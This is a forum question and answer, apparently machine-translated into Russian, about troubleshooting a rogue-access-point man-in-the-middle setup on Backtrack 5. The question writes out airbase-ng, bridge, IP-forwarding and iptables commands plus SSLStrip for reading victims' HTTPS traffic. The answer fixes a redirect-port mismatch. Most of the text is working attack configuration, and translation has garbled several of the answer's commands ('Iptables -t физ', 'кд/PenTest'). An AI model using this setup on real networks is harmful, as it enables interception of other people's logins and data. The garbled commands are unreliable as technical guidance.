SSLStrip не работает для меня

Question

У меня возникли проблемы с SSLStrip в MITM Setup с Backtrack 5. Я использую внешнюю беспроводную карту для трансляции беспроводного сигнала и маршрутизации через Ethernet. Я успешно просматриваю пакеты в Wireshark, однако я хотел бы просматривать данные SSL с помощью SSLStrip. Это предварительные команды, которые я использую для настройки MITM.

airmon-ng start wlan1 
airbase-ng --essid mitm 11 mon0 

--new Terminal--

brctl addbr mitm-bridge 
brctl addif mitm-bridge eth0 
brctl addif mitm-bridge at0 
ifconfig eth0 0.0.0.0 up 
ifconfig at0 0.0.0.0 up 
ifconfig mitm-bridge 192.168.0.199 up 
echo 1 > /proc/sys/net/ipv4/ip_forward 

В этот момент можно просматривать пакетные данные в WireShark. Я следую за этими шагами, чтобы настроить SSLstrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 
cd /pentest/web/sslstrip 
sslstrip -l 8080 

Когда я закончил сессию и открыть sslstrip.log я не вижу каких-либо данных, записанных в файл. Кроме того, я не могу получить доступ к Интернету, как только я переадресую iptables. Пожалуйста, дайте мне знать, что вы думаете о проблеме.

Answer 1

Предполагая, что у вас возникли проблемы с отравлением splstrip и arp, у вас возникла проблема с перенаправлением портов.

Iptables -t физ -A PREROUTING -p TCP --destination-порт 80 -j REDIRECT --to-порт 666

перенаправляет HTTP трафика на 127.0.0.1 порт 666.

кд/PenTest/веб/SSLstrip
SSLstrip -l 8080

начинает SSLstrip прослушивания входящего Traff IC порт 8080

U может либо изменить перенаправление порта на 8080

Iptables -t физ -A PREROUTING -p TCP-порт --destination 80 -j REDIRECT --to-порт 8080

или изменить порт прослушивания на 666

SSLstrip -l 666